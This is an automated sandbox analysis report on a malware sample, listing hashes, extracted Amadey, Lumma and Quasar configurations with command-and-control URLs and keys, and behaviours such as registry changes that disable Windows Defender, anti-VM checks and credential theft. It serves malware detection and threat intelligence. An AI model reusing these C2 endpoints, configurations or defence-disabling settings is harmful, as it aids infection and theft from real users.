Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
02/04/2025, 08:49
Static task
static1
Behavioral task
behavioral1
Sample
random.exe
Resource
win10v2004-20250314-en
General
-
Target
random.exe
-
Size
1.8MB
-
MD5
69b519dedc7e0613a7cda06605b70e5d
-
SHA1
60c3f289998348de873f38caea319306a915673c
-
SHA256
bc1df4f47b17e75b36caabd80929c36b6cb5b3c11aaca17fa069a99597e9eab1
-
SHA512
1520edba3bb9332e0e0ab0ab9d6604958cdbdec2df2ea540746ce1a604dc18668bf01c2a5ffdb614cc6238cc158b5c826cb6425116f6dea57429264dcc98408d
-
SSDEEP
49152:RyW0ezccpjbpBhUnVSLQPsu4vfKj/rj0vWEH:RyhezcIjbvhUVAzfKNE
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://navstarx.shop/FoaJSi
https://dmetalsyo.digital/opsa
https://ironloxp.live/aksdd
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://-targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://targett.top/dsANGt
https://hadvennture.top/GKsiio
https://1ironloxp.live/aksdd
https://vspacedbv.world/EKdlsk
https://wstarcloc.bet/GOksAo
https://atargett.top/dsANGt
https://orodformi.run/aUosoz
https://6targett.top/dsANGt
https://hcosmosyf.top/GOsznj
https://hywnnavstarx.shop/FoaJSi
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/5348-682-0x0000000000510000-0x0000000000988000-memory.dmp healer behavioral1/memory/5348-681-0x0000000000510000-0x0000000000988000-memory.dmp healer behavioral1/memory/5348-1112-0x0000000000510000-0x0000000000988000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" b43c992318.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" b43c992318.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection b43c992318.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" b43c992318.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" b43c992318.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" b43c992318.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" b43c992318.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" b43c992318.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications b43c992318.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" b43c992318.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/memory/3112-196-0x000000000CCF0000-0x000000000CE44000-memory.dmp family_quasar behavioral1/memory/3112-197-0x000000000CE70000-0x000000000CE8A000-memory.dmp family_quasar -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 43b13e599f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7381290483.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ IeGkDOqzXwi9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b43c992318.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 275ebaba42.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ac5ed4bbfd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5JJTKUd3aM0z.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 95 3112 powershell.exe 122 3112 powershell.exe 255 3112 powershell.exe 297 3112 powershell.exe 331 3112 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5036 powershell.exe 6432 powershell.exe 3668 powershell.exe 4844 powershell.exe 5552 powershell.exe 5204 powershell.exe 3112 powershell.exe 4072 powershell.exe 5692 powershell.exe 6132 powershell.exe 1100 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 20 IoCs
flow pid Process 61 5028 rapes.exe 96 5028 rapes.exe 96 5028 rapes.exe 96 5028 rapes.exe 96 5028 rapes.exe 96 5028 rapes.exe 96 5028 rapes.exe 96 5028 rapes.exe 96 5028 rapes.exe 139 5744 68ab528098.exe 267 2344 svchost015.exe 273 6188 svchost.exe 286 5168 svchost015.exe 27 5028 rapes.exe 78 5028 rapes.exe 52 5028 rapes.exe 52 5028 rapes.exe 295 5028 rapes.exe 266 5028 rapes.exe 271 5028 rapes.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 6452 netsh.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 5784 takeown.exe 3748 icacls.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4716 chrome.exe 808 msedge.exe 2844 msedge.exe 4996 msedge.exe 3848 msedge.exe 4048 chrome.exe 4208 chrome.exe 3852 chrome.exe 3240 msedge.exe -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion IeGkDOqzXwi9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 275ebaba42.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 43b13e599f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7381290483.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 68ab528098.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion IeGkDOqzXwi9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 68ab528098.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5JJTKUd3aM0z.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5JJTKUd3aM0z.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b43c992318.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7381290483.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ac5ed4bbfd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b43c992318.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 275ebaba42.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ac5ed4bbfd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 43b13e599f.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation random.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation 68ab528098.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation 261.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Deletes itself 1 IoCs
pid Process 5164 w32tm.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_21cf30a6.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_21cf30a6.cmd powershell.exe -
Executes dropped EXE 30 IoCs
pid Process 5028 rapes.exe 4620 XOPPRUc.exe 3056 h8NlU62.exe 4504 qWR3lUj.exe 4512 YGYZCmt.exe 2344 rapes.exe 4084 captcha.exe 2316 275ebaba42.exe 4008 ac5ed4bbfd.exe 2344 svchost015.exe 4008 43b13e599f.exe 5168 svchost015.exe 5340 7381290483.exe 5744 68ab528098.exe 5552 b57d7fa1b5.exe 4928 IeGkDOqzXwi9.exe 2392 5JJTKUd3aM0z.exe 5348 b43c992318.exe 4140 9a3f4a2326.exe 3580 rapes.exe 6276 136d7a97c3.exe 1620 YGYZCmt.exe 3760 Rm3cVPI.exe 1448 p3hx1_003.exe 6628 qWR3lUj.exe 5992 apple.exe 5488 261.exe 5740 261.exe 1624 tzutil.exe 5164 w32tm.exe -
Identifies Wine through registry keys 2 TTPs 11 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine 7381290483.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine 5JJTKUd3aM0z.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine b43c992318.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine ac5ed4bbfd.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine IeGkDOqzXwi9.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine 275ebaba42.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine 43b13e599f.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 5784 takeown.exe 3748 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features b43c992318.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" b43c992318.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7381290483.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416740101\\7381290483.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\68ab528098.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416750101\\68ab528098.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b57d7fa1b5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416760101\\b57d7fa1b5.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b43c992318.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416770101\\b43c992318.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: captcha.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0006000000023442-535.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 20 IoCs
pid Process 3876 tasklist.exe 2904 tasklist.exe 4164 tasklist.exe 2592 tasklist.exe 2300 tasklist.exe 1072 tasklist.exe 3664 tasklist.exe 6068 tasklist.exe 4652 tasklist.exe 5024 tasklist.exe 4524 tasklist.exe 1676 tasklist.exe 1716 tasklist.exe 4504 tasklist.exe 3160 tasklist.exe 5056 tasklist.exe 3152 tasklist.exe 4984 tasklist.exe 4048 tasklist.exe 1988 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
pid Process 3108 random.exe 5028 rapes.exe 2344 rapes.exe 2316 275ebaba42.exe 4008 ac5ed4bbfd.exe 4008 43b13e599f.exe 5340 7381290483.exe 4928 IeGkDOqzXwi9.exe 2392 5JJTKUd3aM0z.exe 5348 b43c992318.exe 3580 rapes.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 4620 set thread context of 3456 4620 XOPPRUc.exe 98 PID 3056 set thread context of 5036 3056 h8NlU62.exe 103 PID 4504 set thread context of 1168 4504 qWR3lUj.exe 106 PID 4512 set thread context of 3328 4512 YGYZCmt.exe 109 PID 4008 set thread context of 2344 4008 ac5ed4bbfd.exe 240 PID 4008 set thread context of 5168 4008 43b13e599f.exe 277 PID 4140 set thread context of 5356 4140 9a3f4a2326.exe 362 PID 1620 set thread context of 4484 1620 YGYZCmt.exe 372 PID 6628 set thread context of 5304 6628 qWR3lUj.exe 453 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job random.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 4844 powershell.exe 5204 powershell.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2604 sc.exe 3576 sc.exe 2684 sc.exe 3264 sc.exe 5432 sc.exe 4456 sc.exe 7124 sc.exe 5648 sc.exe 3852 sc.exe 4180 sc.exe 5288 sc.exe 5940 sc.exe 5228 sc.exe 5128 sc.exe 5332 sc.exe 6736 sc.exe 1716 sc.exe 6920 sc.exe 6932 sc.exe 5024 sc.exe 6076 sc.exe 5352 sc.exe 1840 sc.exe 2348 sc.exe 2748 sc.exe 2484 sc.exe 4612 sc.exe 5308 sc.exe 3164 sc.exe 3224 sc.exe 3512 sc.exe 5752 sc.exe 4956 sc.exe 4928 sc.exe 4720 sc.exe 4832 sc.exe 2304 sc.exe 6620 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 36 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b43c992318.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 275ebaba42.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 43b13e599f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language p3hx1_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IeGkDOqzXwi9.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage b57d7fa1b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language b57d7fa1b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5JJTKUd3aM0z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 136d7a97c3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7381290483.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b57d7fa1b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ac5ed4bbfd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe -
Checks processor information in registry 2 TTPs 26 IoCs
Processor information is often read in order to detect sandboxing environments.
